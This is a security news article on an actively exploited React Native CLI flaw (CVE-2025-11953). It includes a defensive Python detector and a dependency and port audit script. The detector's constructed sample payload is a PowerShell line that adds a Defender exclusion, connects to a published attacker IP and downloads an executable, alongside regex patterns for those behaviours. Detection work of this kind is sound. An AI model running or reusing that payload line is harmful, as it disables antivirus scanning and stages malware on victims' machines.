Threat actors are actively exploiting a critical remote code execution vulnerability in the widely used @react-native-community/cli npm package, putting the workstations of React Native developers worldwide at risk.
The Vulnerability: CVE-2025-11953
Dubbed Metro4Shell, this critical vulnerability (CVSS 9.8) affects the Metro development server started by the React Native CLI. The flaw lets a remote, unauthenticated attacker who can reach that server execute arbitrary operating system commands on the host, turning a developer workstation into an entry point.
Security firm VulnCheck first observed exploitation on December 21, 2025, though the flaw was originally documented by JFrog in November 2025.
How the Attack Works
Once they can run commands on the host, attackers launch Base64-encoded PowerShell (the observed payloads target Windows hosts) that:
- Adds Microsoft Defender Antivirus exclusions for the working and temp directories, so later stages dropped there go unscanned
- Opens raw TCP connections to attacker-controlled infrastructure
- Downloads and executes Rust-based payloads with anti-analysis features
The attacker infrastructure identified (IPs defanged):
- 5.109.182[.]231
- 223.6.249[.]141
- 134.209.69[.]155
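The behaviours and indicators above are what a detection would key on. The following Python script is an added example, not code from the original article or from VulnCheck or JFrog: it decodes the `-EncodedCommand` blob from a process-creation event, flags the Defender-exclusion, raw-socket and download behaviours the article lists, and matches destination IPs against the three published addresses. The key=value log lines are constructed, and the embedded script is a made-up stand-in for the real payload, which the article does not reproduce.

```python
"""Detection logic for the post-exploitation behaviour described above.

Added example; not code from the original article, VulnCheck or JFrog.
Assumptions: process-creation and network events arrive one per line as
key=value text (Sysmon/4688-like), and the payload is handed to PowerShell
via -EncodedCommand, i.e. Base64 of UTF-16LE text.
"""
import base64
import re

# The three addresses published in the article, defanging brackets removed.
IOC_IPS = {"5.109.182.231", "223.6.249.141", "134.209.69.155"}

# Behaviours the article attributes to the payload. PowerShell is
# case-insensitive, so match the same way.
BEHAVIOUR_PATTERNS = {
    "defender_exclusion": re.compile(
        r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", re.I),
    "raw_tcp_socket": re.compile(r"System\.Net\.Sockets\.TcpClient", re.I),
    "payload_download": re.compile(
        r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.I),
}
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None.

    A blob that is not valid Base64 or not UTF-16LE is nothing powershell.exe
    would run, so it is treated as "not encoded PowerShell".
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(line):
    """Return the sorted list of findings for one event line.

    The decoded script (if any) is appended to the raw line before matching,
    so indicators hidden inside the Base64 blob are seen as well.
    """
    findings = set()
    text = line
    decoded = decode_encoded_command(line)
    if decoded is not None:
        findings.add("encoded_powershell")
        text = f"{line}\n{decoded}"
    for label, pattern in BEHAVIOUR_PATTERNS.items():
        if pattern.search(text):
            findings.add(label)
    for ip in IPV4.findall(text):
        if ip in IOC_IPS:
            findings.add(f"ioc_ip:{ip}")
    return sorted(findings)


def scan(lines):
    """Return {line_number: findings} for every line with at least one finding."""
    results = {}
    for number, line in enumerate(lines, start=1):
        findings = analyse_event(line)
        if findings:
            results[number] = findings
    return results


# Constructed stand-in for the real payload (the article does not reproduce it);
# it only exercises the three behaviours listed above.
SAMPLE_SCRIPT = (
    "Add-MpPreference -ExclusionPath $env:TEMP; "
    "$c = New-Object System.Net.Sockets.TcpClient('5.109.182.231', 443); "
    "(New-Object Net.WebClient).DownloadFile('http://5.109.182.231/s', \"$env:TEMP\\s.exe\")"
)
ENCODED_BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed log lines; 203.0.113.10 is a documentation address standing in
# for benign traffic.
SAMPLE_LOGS = [
    'EventID=4688 NewProcessName=C:\\Program Files\\nodejs\\node.exe '
    'CommandLine="node node_modules\\.bin\\react-native start"',
    'EventID=4688 ParentProcessName=C:\\Program Files\\nodejs\\node.exe '
    'NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'CommandLine="powershell -NoP -W Hidden -EncodedCommand {ENCODED_BLOB}"',
    'EventID=3 Image=C:\\Program Files\\nodejs\\node.exe DestinationIp=203.0.113.10 DestinationPort=443',
    'EventID=3 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'DestinationIp=223.6.249.141 DestinationPort=443',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOGS).items():
        print(number, findings)
```

Running it flags line 2 (encoded PowerShell spawned under node.exe, carrying all three behaviours and one IoC address) and line 4 (an outbound connection to a published IP), while the developer's own `react-native start` and the benign connection produce nothing. The behaviour patterns are the durable part: the IP set is worth loading but will go stale as soon as the infrastructure rotates.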
Why This Matters
React Native is one of the most popular cross-platform mobile development frameworks, used by companies from startups to Fortune 500 enterprises. The Metro bundler is a required part of the development workflow, so any developer running a vulnerable CLI version with the dev server reachable from an untrusted network is exposed.
VulnCheck emphasized this isn’t experimental probing: “The delivered payloads were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.”
CISA Responds
On February 5, 2026, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-11953 to its Known Exploited Vulnerabilities (KEV) catalog. Federal Civilian Executive Branch agencies must apply fixes by February 26, 2026.
Critical Lesson
“Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.”
This attack underscores a dangerous blind spot: development environments are often left reachable with weaker security controls than production systems, yet they hold source code, credentials, and direct access to corporate networks.
Recommendations
- Update the React Native CLI to a patched release now; check every @react-native-community/cli* package in the lockfile, including nested copies pulled in by other dependencies, not only the top-level one
- Audit network exposure: bind the dev server to loopback or a firewalled interface and never expose it to the internet; a shared office LAN or public Wi-Fi can reach it just as well
- Monitor for IoCs: check proxy and firewall logs for connections to the identified IPs, and because IPs rotate, also alert on the behaviour itself, such as Add-MpPreference exclusion changes and PowerShell spawned by the Node process that runs the dev server
- Harden development environments: treat dev workstations as attack surface, with the same logging and endpoint coverage as production
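Two of those checks can be scripted. The Python below is an added example, not tooling from the React Native project or the original article: it walks a package-lock.json for every installed copy of a @react-native-community/cli* package below a patched floor (prerelease-aware, so 20.0.0-alpha.2 sorts below 20.0.0), and parses `ss -ltn`-style output for the dev-server port bound to a wildcard address. The lockfile, the socket listing, and the floor version 20.0.0 are assumptions for illustration; take the authoritative fixed versions from the vendor advisory.

```python
"""Two audit checks for the recommendations above.

Added example; not code from the React Native project or the original article.
Assumptions: package-lock.json v2/v3 layout ('packages' keyed by install path),
`ss -ltn`-style socket listing, Metro's default port 8081, and a patched floor
supplied by the caller (the 20.0.0 used below is illustrative; take the real
fixed versions from the vendor advisory).
"""

WILDCARD_HOSTS = {"*", "0.0.0.0", "[::]", "::"}
CLI_PREFIX = "@react-native-community/cli"


def parse_version(v):
    """Map 'MAJOR.MINOR.PATCH[-pre]' to a tuple that sorts like semver:
    a prerelease (20.0.0-alpha.2) orders before its release (20.0.0)."""
    core, _, pre = v.partition("-")
    nums = tuple(int(x) for x in core.split("."))
    return (nums, 0 if pre else 1, pre)


def vulnerable_cli_packages(lock, patched_floor):
    """Return {install_path: version} for every installed copy of a
    @react-native-community/cli* package older than patched_floor.

    Walks every entry in 'packages', so nested copies under another
    dependency's node_modules are caught, not just the top-level one.
    """
    floor = parse_version(patched_floor)
    found = {}
    for path, meta in lock.get("packages", {}).items():
        if "node_modules/" not in path:
            continue  # the root project entry ("") has no install path
        name = path.rsplit("node_modules/", 1)[1]
        if name.startswith(CLI_PREFIX) and parse_version(meta["version"]) < floor:
            found[path] = meta["version"]
    return found


def exposed_listeners(ss_lines, port=8081):
    """Return the local addresses from `ss -ltn` output where `port` is bound
    to a wildcard address, i.e. reachable from any network the host is on."""
    exposed = []
    for line in ss_lines:
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header line or non-listening socket
        host, _, lport = fields[3].rpartition(":")
        if lport == str(port) and host in WILDCARD_HOSTS:
            exposed.append(fields[3])
    return exposed


# Constructed package-lock.json excerpt (not a real project's lockfile);
# "some-plugin" is a made-up dependency that vendors its own CLI copy.
SAMPLE_LOCK = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app"},
        "node_modules/@react-native-community/cli": {"version": "19.1.1"},
        "node_modules/@react-native-community/cli-server-api": {"version": "19.1.1"},
        "node_modules/@react-native-community/cli-tools": {"version": "20.0.0"},
        "node_modules/some-plugin/node_modules/@react-native-community/cli-server-api": {
            "version": "20.0.0-alpha.2"},
        "node_modules/metro": {"version": "0.83.1"},
    },
}

# Constructed `ss -ltn` output for a developer workstation.
SAMPLE_SS = [
    "State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process",
    'LISTEN 0      511    127.0.0.1:5173      0.0.0.0:*         users:(("node",pid=4100,fd=20))',
    'LISTEN 0      511    *:8081              *:*               users:(("node",pid=4242,fd=19))',
    "LISTEN 0      128    [::]:22             [::]:*",
]


def audit(lock=SAMPLE_LOCK, ss_lines=SAMPLE_SS, patched_floor="20.0.0"):
    """Run both checks and return their findings together."""
    return {
        "vulnerable_packages": vulnerable_cli_packages(lock, patched_floor),
        "exposed_listeners": exposed_listeners(ss_lines),
    }


if __name__ == "__main__":
    print(audit())
```

On the constructed input the lockfile check reports three copies below the floor, including the nested alpha build that a plain `npm ls` of the top-level dependency would not draw attention to, and the socket check reports the dev server on `*:8081` while ignoring the loopback-only listener on 5173. Point the two functions at `json.load(open("package-lock.json"))` and the output of `ss -ltn` on a real workstation.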
Read the full technical analysis: The Hacker News
